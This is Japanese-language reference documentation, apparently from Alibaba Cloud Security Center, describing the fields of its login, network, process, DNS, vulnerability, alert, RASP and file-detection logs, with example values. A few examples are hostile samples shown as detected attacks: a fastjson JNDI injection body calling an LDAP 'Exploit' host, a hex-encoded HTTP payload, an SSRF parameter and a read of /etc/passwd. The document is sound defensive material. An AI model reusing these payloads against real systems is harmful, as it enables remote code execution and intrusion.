Security Center:ログタイプとフィールドの説明

フィールド

説明

例

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

sas_group_name

Security Center のサーバーの資産グループ。

default

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

src_ip

ログイン元の IP アドレス。

221.11.XX.XX

dst_port

サーバーのログインポート。

22

login_type

ログインタイプ。有効な値は次のとおりですが、これらに限定されません:

• SSHLOGIN, SSH: SSH ログイン。

• RDPLOGIN: リモートデスクトップログイン。

• IPCLOGIN: IPC 接続ログイン。

SSH

username

ログインユーザー名。

admin

login_count

ログイン数。

1 分以内の繰り返しログインは、1 つのログエントリにマージされます。たとえば、login_count の値が 3 の場合、過去 1 分間に 3 回の繰り返しログインがあったことを示します。

3

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

cmd_chain

プロセスチェーン。

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

プロセスチェーンのインデックス。インデックスを使用してプロセスチェーンを検索します。

B184

container_hostname

コンテナー内のサーバー名。

nginx-ingress-controller-765f67fd4d-****

container_id

コンテナー ID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

イメージ ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

イメージ名。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

コンテナー名。

nginx-ingress-****

container_pid

コンテナー内のプロセス ID。

0

net_connect_dir

ネットワーク接続の方向。有効な値:

• in：インバウンド

• out：アウトバウンド

in

dst_ip

ネットワーク接続受信者の IP アドレス。

• dir が out の場合、これはピアホストです。

• dir が in の場合、これはローカルホストです。

192.168.XX.XX

dst_port

ネットワーク接続受信者のポート。

443

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

parent_proc_name

親プロセスのファイル名。

/usr/bin/bash

pid

プロセス ID。

14275

ppid

親プロセス ID。

14268

proc_name

プロセス名。

nginx

proc_path

プロセスパス。

/usr/local/nginx/sbin/nginx

proc_start_time

プロセスの起動時刻。

N/A

connection_type

プロトコル。有効な値:

• tcp

• raw (RAW ソケットを示します)

tcp

sas_group_name

Security Center のサーバーの資産グループ。

default

src_ip

ソース IP アドレス。

100.127.XX.XX

src_port

ソースポート。

41897

srv_comm

祖父プロセスに関連付けられたコマンド名。

containerd-shim

status

ネットワーク接続ステータス。有効な値:

• 1：クローズ

• 2：接続リクエストをリッスン中。

• 3：SYN 送信済み

• 4：SYN 受信済み

• 5：確立済み

• 6：クローズ待機

• 7：クローズ中

• 8：FIN 待機 1

• 9：FIN 待機 2

• 10：時間待機

• 11：TCB 削除済み

5

type

リアルタイムネットワーク接続のタイプ。有効な値:

• connect：アクティブな TCP 接続が開始されます。

• accept：TCP 接続が受信されます。

• listen：ポートはリッスン状態です。

listen

uid

プロセスユーザーの ID。

101

username

プロセスのユーザー名。

root

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

ブルートフォース攻撃の対象となるサーバーの IP アドレス。

192.168.XX.XX

sas_group_name

Security Center のサーバーの資産グループ。

default

uuid

ブルートフォース攻撃の対象となるサーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12*****

login_count

失敗したログインの数。

1 分以内の繰り返しログインは、1 つのログエントリにマージされます。たとえば、warn_count の値が 3 の場合、過去 1 分間に 3 回の繰り返しログインがあったことを示します。

3

src_ip

ログイン元の IP アドレス。

47.92.XX.XX

dst_port

ログインポート。

22

login_type

ログインタイプ。有効な値:

• SSHLOGIN, SSH: SSH ログイン。

• RDPLOGIN: リモートデスクトップログイン。

• IPCLOGIN: IPC 接続ログイン。

• SQLSERVER：SQL Server ログイン失敗。

SSH

username

ログインユーザー名。

user

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

account_expire

アカウントの有効期限。never は、アカウントが期限切れにならないことを示します。

never

domain

アカウントが属するドメインまたはディレクトリサービス。N/A は、アカウントがどのドメインにも属していないことを示します。

N/A

groups

アカウントが属するグループ。N/A は、アカウントがどのグループにも属していないことを示します。

["nscd"]

home_dir

ホームディレクトリ。これは、システム内でファイルを保存および管理するためのデフォルトの場所です。

/Users/abc

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

last_chg

パスワードが最後に変更された日付。

2022-11-29

last_logon

アカウントへの最終ログインの日時。N/A は、アカウントにログインしたことがないことを示します。

2023-08-18 09:21:21

login_ip

アカウントへの最終ログインのリモート IP アドレス。N/A は、アカウントにログインしたことがないことを示します。

192.168.XX.XX

passwd_expire

パスワードの有効期限。never は、パスワードが期限切れにならないことを示します。

2024-08-24

perm

アカウントに root 権限があるかどうかを示します。有効な値:

• 0：アカウントは root 権限を持っていません。

• 1：アカウントは root 権限を持っています。

0

sas_group_name

Security Center のサーバーの資産グループ。

default

shell

Linux シェルコマンド。

/sbin/nologin

status

ユーザーアカウントのステータス。有効な値:

• 0: アカウントはログインを禁止されています。

• 1: アカウントは正常にログインできます。

0

tty

ログイン端末。N/A は、アカウントが端末にログインしたことがないことを示します。

N/A

username

ユーザー名。

nscd

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

warn_time

パスワードの有効期限リマインダーの日付。never は、リマインダーが送信されないことを示します。

2024-08-20

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

net_connect_dir

ネットワーク接続の方向。有効な値:

• in：インバウンド

• out：アウトバウンド

in

dst_ip

ネットワーク接続受信者の IP アドレス。

• dir が out の場合、これはピアホストです。

• dir が in の場合、これはローカルホストです。

192.168.XX.XX

dst_port

ネットワーク接続受信者のポート。

443

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

pid

プロセス ID。

682

proc_name

プロセス名。

sshd

connection_type

プロトコル。有効な値:

• tcp4: IPv4 上の TCP 接続。

• tcp6: IPv6 上の TCP 接続。

tcp4

sas_group_name

Security Center のサーバーの資産グループ。

default

src_ip

ソース IP アドレス。

100.127.XX.XX

src_port

ソースポート。

41897

status

ネットワーク接続ステータス。有効な値:

• 1：クローズ

• 2：接続リクエストをリッスン中

• 3：SYN 送信済み

• 4：SYN 受信済み

• 5：確立済み

• 6：クローズ待機

• 7：クローズ中

• 8：FIN 待機 1

• 9：FIN 待機 2

• 10：時間待機

• 11：TCB 削除済み

5

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

cmdline

プロセスを起動するための完全なコマンドライン。

/usr/local/share/assist-daemon/assist_daemon

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

md5

バイナリファイルの MD5 ハッシュ。

1086e731640751c9802c19a7f53a64f5

proc_name

プロセスファイル名。

assist_daemon

proc_path

プロセスファイルの完全なパス。

/usr/local/share/assist-daemon/assist_daemon

pid

プロセス ID。

1692

pname

親プロセスのファイル名。

systemd

sas_group_name

Security Center のサーバーの資産グループ。

default

proc_start_time

プロセスの起動時刻。これは組み込みフィールドです。

2023-08-18 20:00:12

uid

プロセスユーザーの ID。

101

username

プロセスのユーザー名。

root

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

domain

DNS リクエストに対応するドメイン名。

example.aliyundoc.com

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

host_ip

DNS リクエストを開始したサーバーの IP アドレス。

192.168.XX.XX

pid

DNS リクエストを開始したプロセスの ID。

3544

ppid

DNS リクエストを開始した親プロセスの ID。

3408

cmd_chain

DNS リクエストを開始したプロセスチェーン。

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

DNS リクエストを開始したコマンドライン。

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

DNS リクエストを開始したプロセスのパス。

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

Security Center のサーバーの資産グループ。

default

time

DNS リクエストイベントがキャプチャされた時刻。この時刻は通常、DNS リクエストが発生した時刻と同じです。

2023-08-17 20:05:04

uuid

DNS リクエストを開始したサーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

host_ip

サーバーの IP アドレス。

192.168.XX.XX

agent_version

クライアントバージョン。

aegis_11_91

last_login

最終ログインのタイムスタンプ。単位: ミリ秒。

1716444387617

platform

オペレーティングシステムのタイプ。有効な値:

• windows

• linux

linux

region_id

サーバーが存在するリージョンの ID。

cn-beijing

status

クライアントのステータス。有効な値:

• online

• offline

online

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

vul_alias_name

脆弱性のエイリアス。

CESA-2023:1335: openssl Security Update

risk_level

リスクレベル。有効な値:

• asap: 高

• later: 中

• nntf: 低

later

extend_content

脆弱性に関する拡張情報。

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

internet_ip

アセットのパブリック IP アドレス。

39.104.XX.XX

intranet_ip

アセットのプライベート IP アドレス。

192.168.XX.XX

instance_name

ホスト名。

hhht-linux-***

vul_name

脆弱性名。

centos:7:cesa-2023:1335

operation

脆弱性に対して実行されたアクション。有効値：

• new：新規

• Verify は認証を意味します。

• fix：修正

new

status

ステータス。有効値：

• 1：未修正

• 2：修正失敗

• 3：ロールバック失敗

• 4：修正中

• 5：ロールバック中

• 6：検証中

• 7：修正済み

• 8：修正済み、再起動が必要

• 9：ロールバック済み

• 10：無視

• 11：ロールバック済み、再起動が必要

• 12：存在しない

• 13：無効

1

tag

脆弱性のタグ。有効な値:

• oval：Linux ソフトウェアの脆弱性

• system：Windows システムの脆弱性

• cms：Web-CMS の脆弱性

  説明

  他の脆弱性タイプのタグはランダムな文字列です。

oval

type

脆弱性タイプ。有効な値:

• sys：Windows システムの脆弱性

• cve：Linux ソフトウェアの脆弱性

• cms：Web-CMS の脆弱性

• emg：緊急の脆弱性

sys

uuid

サーバー UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

check_item_name

チェック項目の名前。

Set minimum interval for password changes

check_item_level

ベースラインのチェックレベル。有効値：

• high：高

• medium：中程度の深刻度を示します。

• low：低

medium

check_type

チェック項目のタイプ。

ID 認証

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

risk_level

リスク項目のレベル。有効値：

• high：高

• medium：中。

• low：低

medium

operation

操作。有効値：

• new：新規

• verity：検証

new

risk_name

リスク項目の名前。

パスワードポリシーコンプライアンスチェック

sas_group_name

Security Center でリスク項目が検出されたサーバーのアセットグループ。

default

status

ステータス。有効値：

• 1：失敗

• 2：検証中

• 6：無視

• 7: 修正中

1

sub_type_alias_name

サブタイプのエイリアス。

国際セキュリティベストプラクティス - Ubuntu 16/18/20/22 セキュリティベースラインチェック

sub_type_name

ベースラインサブタイプ名。ベースラインサブタイプの有効値の詳細については、「ベースラインタイプとサブタイプのリスト」をご参照ください。

hc_ubuntu16_cis_rules

type_alias_name

タイプのエイリアス。

国際的なセキュリティベストプラクティス

type_name

ベースラインタイプ。ベースラインタイプの有効値の詳細については、「ベースラインタイプとサブタイプのリスト」をご参照ください。

cis

uuid

リスク項目が検出されたサーバーの UUID。

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

data_source

データソース。有効な値:

• aegis_suspicious_event：ホスト上の異常なアクティビティ

• aegis_suspicious_file_v2：Webshell

• aegis_login_log：異常なログイン

• honeypot：クラウドハニーポットアラートイベント

• object_scan：ファイル検出の異常

• security_event：Security Center の異常

• sas_ak_leak：AK 漏洩イベント

aegis_login_log

detail

アラートの詳細なコンテキストを提供する JSON オブジェクト。このオブジェクトのフィールドはアラートタイプによって異なります。

以下に、detail オブジェクトの一般的なフィールド、たとえば alert_reason (異常の理由) について説明します：

• reason1：IP アドレスが通常のログイン場所のものではありません。

• reason2: API 呼び出しが失敗しました。

• reason3：IP アドレスが通常のログイン場所のものではなく、API 呼び出しが失敗しました。

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Unusual Account Logon to ECS","status":0}

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

internet_ip

アセットのパブリック IP アドレス。

39.104.XX.XX

intranet_ip

アセットのプライベート IP アドレス。

192.168.XX.XX

level

アラートイベントのリスクレベル。有効な値:

• serious：緊急

• suspicious：不審

• remind：注意

suspicious

name

アラート名。

異常なログイン - ECS への異常なアカウントログイン

operation

操作。有効値：

• new：新規

• dealing：処理中

• update：更新済み

new

status

アラートのステータス。有効な値:

• 1：未処理。新しいアラートはこのステータスになります。

• 2：無視。コンソールで無視した後のアラートはこのステータスになります。

• 8：ホワイトリスト登録済み。コンソールでホワイトリストに追加した後のアラートはこのステータスになります。

• 16：処理中。プロセスの終了、ファイルの隔離、コンソールでのホワイトリストへの追加など、アラートが処理中の場合、このステータスになります。

• 32：処理済み。手動で処理済みとマークした後、またはプロセスの終了やファイルの隔離などの処理アクションがコンソールで完了した後のアラートはこのステータスになります。

• 64：期限切れ。30 日以内に処理されないアラートは期限切れとマークされます。

• 513：自動的にブロック済み。アラートは Security Center の精密防御機能によって自動的にブロックされ、手動での操作は不要です。

1

unique_info

アラートの一意の識別子。

2536dd765f804916a1fa3b9516b5****

uuid

アラートを生成したサーバーの UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

suspicious_event_id

アラートイベント ID。

650226318

handle_time

操作に対応する時刻。

1765272845

alert_first_time

アラートが最初に発生した時刻。

1764226915

alert_last_time

アラートが最後に発生した時刻。

1765273425

strict_type

アラートが厳格モードのアラートであるかどうかを示します。有効な値：true、false。

user_id

アカウント ID。

1358******3357

フィールド

説明

例

check_id

チェック項目の ID。ListCheckResult 操作を呼び出して ID を取得できます。

11

check_item_name

チェック項目の名前。

オリジンフェッチ設定

instance_id

インスタンス ID。

i-2zeg4zldn8zypsfg****

instance_name

インスタンス名。

lsm

instance_result

リスクの影響。値は JSON 文字列です。

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

インスタンスのサブタイプ。有効な値:

• インスタンスタイプが ECS の場合、サブタイプの有効値は次のとおりです：

  • INSTANCE

  • DISK

  • SECURITY_GROUP

• インスタンスタイプが ACR の場合、サブタイプの有効値は次のとおりです：

  • REPOSITORY_ENTERPRISE

  • REPOSITORY_PERSON

• インスタンスタイプが RAM の場合、サブタイプの有効値は次のとおりです：

  • ALIAS

  • USER

  • POLICY

  • GROUP

• インスタンスタイプが WAF の場合、サブタイプは DOMAIN です。

• インスタンスタイプが別の値の場合、サブタイプは INSTANCE です。

INSTANCE

instance_type

インスタンスタイプ。有効な値:

• ECS は Elastic Compute Service を表します。

• SLB (Server Load Balancer)。

• RDS：RDS

• MONGODB：MongoDB

• KVSTORE：Redis

• ACR は Container Registry を表します。

• CSK：CSK

• VPC は Virtual Private Cloud を表します。

• ActionTrail は操作監査サービスです。

• CDN：Content Delivery Network。

• CAS：Certificate Management Service

• RDC：Apsara Devops

• RAM：RAM

• DDOS：Anti-DDoS

• WAF は Web Application Firewall を表します。

• OSS (Object Storage Service)。

• POLARDB：PolarDB

• POSTGRESQL：PostgreSQL

• MSE：Microservices Engine。

• NAS：ファイルストレージ

• SDDP：機密データ検出・保護

• Elastic IP Address (EIP)。

ECS

region_id

インスタンスが存在するリージョンの ID。

cn-hangzhou

requirement_id

要件 ID。ListCheckStandard 操作を呼び出して ID を取得できます。

5

risk_level

リスクレベル。有効な値:

• LOW

• MEDIUM

• HIGH

MEDIUM

section_id

セクション ID。ListCheckResult 操作を呼び出して ID を取得できます。

1

standard_id

標準 ID。ListCheckStandard 操作を呼び出して ID を取得できます。

1

status

チェック項目のステータス。有効な値:

• NOT_CHECK：未チェック

• CHECKING：チェック中

• PASS：合格

• NOT_PASS：不合格

• WHITELIST：ホワイトリスト登録済み

PASS

vendor

クラウドサービスプロバイダー。値は ALIYUN に固定されています。

ALIYUN

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

cmd

攻撃されたプロセスのコマンドライン。

nginx: master process nginx

cur_time

攻撃イベントが発生した時刻。

2023-09-14 09:21:59

decode_payload

HEX 形式から文字に変換されたペイロード。

POST /Services/FileService/UserFiles/

dst_ip

攻撃されたアセットの IP アドレス。

172.16.XX.XX

dst_port

攻撃されたアセットのポート。

80

func

インターセプトされたイベントのタイプ。有効値：

• payload：悪意のあるペイロードタイプ。これは、悪意のあるデータまたは命令が検出されたために攻撃イベントがインターセプトされたことを示します。

• tuple：悪意のある IP タイプ。これは、悪意のある IP アクセスが検出されたために攻撃イベントがインターセプトされたことを示します。

payload

rule_type

インターセプトされたイベントの特定のルールタイプ。有効値：

• alinet_payload: Security Center によって指定された payload イベント防御ルール。

• alinet_tuple: Security Center によって指定された tuple イベント防御ルール。

alinet_payload

instance_id

攻撃されたアセットのインスタンス ID。

i-2zeg4zldn8zypsfg****

internet_ip

攻撃されたアセットのパブリック IP アドレス。

39.104.XX.XX

intranet_ip

攻撃されたアセットのプライベート IP アドレス。

192.168.XX.XX

final_action

防御アクションモード。値は block (インターセプト済み) です。

block

payload

HEX 形式のペイロード。

504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20****

pid

攻撃されたプロセスの ID。

7107

platform

攻撃されたアセットのシステムタイプ。有効値：

• windows

• linux

linux

proc_path

攻撃されたプロセスのパス。

/usr/sbin/nginx

sas_group_name

Security Center のサーバーの資産グループ。

default

src_ip

攻撃を開始した送信元 IP アドレス。

106.11.XX.XX

src_port

攻撃を開始した送信元ポート。

29575

uuid

サーバーの UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

app_dir

アプリケーションが存在するディレクトリ。

/usr/local/aegis/rasp/apps/1111

app_id

アプリケーション ID。

6492a391fc9b4e2aad94****

app_name

アプリケーション名。

test

confidence_level

検出アルゴリズムの信頼度レベル。有効な値:

• high

• medium

• low

low

request_body

リクエストボディ。

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true}

request_content_length

リクエストボディの長さ。

112

data

フックポイントパラメーター。

{"cmd":"bash -c kill -0 -- -'31098' "}

headers

リクエストヘッダー。

{"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"}

hostname

ホストまたはネットワークデバイスの名前。

testhostname

host_ip

ホストのプライベート IP アドレス。

172.16.XX.XX

is_cliped

ログが長すぎて切り捨てられたかどうかを示します。有効値：

• true：切り捨て済み

• false：切り捨てられていない

false

jdk_version

JDK バージョン。

1.8.0_292

message

アラートの説明。

Unsafe class serial.

request_method

リクエストメソッド。

Post

platform

オペレーティングシステムのタイプ。

Linux

arch

オペレーティングシステムのアーキテクチャ。

amd64

kernel_version

オペレーティングシステムのカーネルバージョン。

3.10.0-1160.59.1.el7.x86_64

param

リクエストパラメーター。一般的な形式には、以下が含まれます。

• GET パラメーター

• application/x-www-form-urlencoded

{"url":["http://127.0.0.1.xip.io"]}

payload

攻撃ペイロード。

bash -c kill -0 -- -'31098'

payload_length

攻撃ペイロードの長さ。

27

rasp_id

アプリケーション保護プローブの一意の ID。

fa00223c8420e256c0c98ca0bd0d****

rasp_version

アプリケーション保護プローブのバージョン。

0.8.5

src_ip

リクエスターの IP アドレス。

172.0.XX.XX

final_action

アラート処理結果。有効な値:

• block：保護 (ブロック済み)

• monitor：監視

block

rule_action

ルールで指定されたアラート処理メソッド。有効な値:

• block

• monitor

block

risk_level

リスクレベル。有効な値:

• high

• medium

• low

high

stacktrace

スタック情報。

[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]

time

アラートがトリガーされた時刻。

2023-10-09 15:19:15

timestamp

アラートがトリガーされたタイムスタンプ (ミリ秒) 。

1696835955070

type

攻撃タイプ。有効な値:

• attach：悪意のあるアタッチ

• beans：悪意のある beans バインディング

• classloader：悪意のあるクラスローディング

• dangerous_protocol：危険なプロトコルの使用

• dns：悪意のある DNS クエリ

• engine：エンジンインジェクション

• expression：式インジェクション

• file：悪意のあるファイルの読み書き

• file_delete：任意のファイル削除

• file_list：ディレクトリトラバーサル

• file_read：任意のファイル読み取り

• file_upload：悪意のあるファイルのアップロード

• jndi：JNDI インジェクション

• jni：JNI インジェクション

• jstl：JSTL 任意ファイルインクルード

• memory_shell：インメモリ Web シェルインジェクション

• rce：リモートコード実行

• read_object：デシリアライゼーション攻撃

• reflect：悪意のあるリフレクション呼び出し

• sql：SQL インジェクション

• ssrf：悪意のあるアウトバウンド接続

• thread_inject：スレッドインジェクション

• xxe：XXE 攻撃

rce

url

リクエスト URL。

http://127.0.0.1:999/xxx

rasp_attack_uuid

攻撃イベントの UUID。

18823b23-7ad4-47c0-b5ac-e5f036a2****

uuid

ホスト UUID。

23f7ca61-e271-4a8e-bf5f-165596a16****

internet_ip

ホストのパブリック IP アドレス。

1.2.XX.XX

intranet_ip

ホストのプライベート IP アドレス。

172.16.XX.XX

sas_group_name

Security Center のサーバーグループの名前。

Group 1

instance_id

ホストインスタンス ID。

i-wz995eivg28f1m**

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

bucket_name

バケット名。

***-test

event_id

アラート ID。

802210

event_name

アラート名。

マイニングプログラム

md5

ファイルの MD5 ハッシュ。

6bc2bc******53d409b1

sha256

ファイルの SHA256 ハッシュ。

f038f9525******7772981e87f85

result

検出結果。有効な値:

• 0: ファイルは安全です。

• 1: 悪意のあるファイルが存在します。

0

file_path

ファイルパス。

test.zip/bin_test

etag

OSS ファイル識別子。

6BC2B******853D409B1

risk_level

リスクレベル。有効な値:

• serious：緊急

• suspicious：不審

• remind：注意

remind

source

検出シナリオ。有効な値:

• OSS：Security Center コンソールで Alibaba Cloud Object Storage Service バケット内のファイルの検知が実行されました。

• API：SDK を使用して悪意のあるファイルを検知しました。Java または Python を使用して SDK を統合できます。

OSS

parent_md5

親ファイルまたは圧縮パッケージの MD5 ハッシュ。

3d0f8045bb9******

parent_sha256

親ファイルまたは圧縮パッケージの SHA256 ハッシュ。

69b643d6******a3fb859fa

parent_file_path

親ファイルまたは圧縮パッケージの名前。

test.zip

start_time

開始タイムスタンプ (秒単位)。これはイベントの発生時刻も示します。

1719472214

フィールド

説明

例

start_time

イベントが最後に発生した時刻。単位: 秒。

1718678414

uuid

エージェントの UUID。

5d83b26b-b**a-4**a-9267-12****

file_path

ファイルパス。

/etc/passwd

proc_path

プロセスパス。

/usr/bin/bash

rule_id

ヒットしたルールの ID。

123

rule_name

ルール名。

file_test_rule

cmdline

コマンドライン。

bash /opt/a

operation

ファイルに対する操作。

READ

risk_level

アラートレベル。

2

pid

プロセス ID。

45324

proc_permission

プロセス権限。

rwxrwxrwx

instance_id

インスタンス ID。

i-wz995eivg2****

internet_ip

パブリック IP アドレス。

192.0.2.1

intranet_ip

プライベート IP アドレス。

172.16.0.1

instance_name

インスタンス名。

aegis-test

platform

オペレーティングシステムのタイプ。

Linux

タイプ名

サブタイプ名

説明

hc_exploit

hc_exploit_redis

重要な脅威の悪用：Redis への不正アクセス

hc_exploit_activemq

重要な脅威の悪用：ActiveMQ への不正アクセス

hc_exploit_couchdb

重要な脅威の悪用：CouchDB への不正アクセス

hc_exploit_docker

重要な脅威の悪用：Docker への不正アクセス

hc_exploit_es

重要な脅威の悪用：Elasticsearch への不正アクセス

hc_exploit_hadoop

重要な脅威の悪用：Hadoop への不正アクセス

hc_exploit_jboss

重要な脅威の悪用：JBoss への不正アクセス

hc_exploit_jenkins

重要な脅威の悪用：Jenkins への不正アクセス

hc_exploit_k8s_api

重要な脅威の悪用：Kubernetes API サーバーへの不正アクセス

hc_exploit_ldap

重要な脅威の悪用：LDAP への不正アクセス (Windows 環境)

hc_exploit_ldap_linux

重要な脅威の悪用：OpenLDAP への不正アクセス (Linux 環境)

hc_exploit_memcache

重要な脅威の悪用：Memcached への不正アクセス

hc_exploit_mongo

重要な脅威の悪用：MongoDB への不正アクセス

hc_exploit_pgsql

重要な脅威の悪用：PostgreSQL への不正アクセス

hc_exploit_rabbitmq

重要な脅威の悪用：RabbitMQ への不正アクセス

hc_exploit_rsync

重要な脅威の悪用：rsync への不正アクセス

hc_exploit_tomcat

重要な脅威の悪用：Apache Tomcat AJP ファイルインクルードの脆弱性

hc_exploit_zookeeper

重要な脅威の悪用：ZooKeeper への不正アクセス

hc_container

hc_docker

Alibaba Cloud 標準：Docker セキュリティベースラインチェック

hc_middleware_ack_master

国際セキュリティベストプラクティス：Kubernetes (ACK) マスターノードセキュリティベースラインチェック

hc_middleware_ack_node

国際セキュリティベストプラクティス：Kubernetes (ACK) ノードセキュリティベースラインチェック

hc_middleware_k8s

Alibaba Cloud 標準：Kubernetes マスターノードセキュリティベースラインチェック

hc_middleware_k8s_node

Alibaba Cloud 標準：Kubernetes ノードセキュリティベースラインチェック

cis

hc_suse 15_djbh

MLPS 2.0 レベル 3：SUSE 15 コンプライアンスベースラインチェック

hc_aliyun_linux3_djbh_l3

MLPS 2.0 レベル 3：Alibaba Cloud Linux 3 コンプライアンスベースラインチェック

hc_aliyun_linux_djbh_l3

MLPS 2.0 レベル 3：Alibaba Cloud Linux/Aliyun Linux 2 コンプライアンスベースラインチェック

hc_bind_djbh

MLPS 2.0 レベル 3：Bind コンプライアンスベースラインチェック

hc_centos 6_djbh_l3

MLPS 2.0 レベル 3：CentOS Linux 6 コンプライアンスベースラインチェック

hc_centos 7_djbh_l3

MLPS 2.0 レベル 3：CentOS Linux 7 コンプライアンスベースラインチェック

hc_centos 8_djbh_l3

MLPS 2.0 レベル 3：CentOS Linux 8 コンプライアンスベースラインチェック

hc_debian_djbh_l3

MLPS 2.0 レベル 3：Debian Linux 8/9/10 コンプライアンスベースラインチェック

hc_iis_djbh

MLPS 2.0 レベル 3：IIS コンプライアンスベースラインチェック

hc_informix_djbh

MLPS 2.0 レベル 3：Informix コンプライアンスベースラインチェック

hc_jboss_djbh

MLPS 2.0 レベル 3：JBoss コンプライアンスベースラインチェック

hc_mongo_djbh

MLPS 2.0 レベル 3：MongoDB コンプライアンスベースラインチェック

hc_mssql_djbh

MLPS レベル 3：SQL Server コンプライアンスベースラインチェック

hc_mysql_djbh

MLPS 2.0 レベル 3：MySQL コンプライアンスベースラインチェック

hc_nginx_djbh

MLPS 2.0 レベル 3：Nginx コンプライアンスベースラインチェック

hc_oracle_djbh

MLPS レベル 3：Oracle コンプライアンスベースラインチェック

hc_pgsql_djbh

MLPS 2.0 レベル 3：PostgreSQL コンプライアンスベースラインチェック

hc_redhat 6_djbh_l3

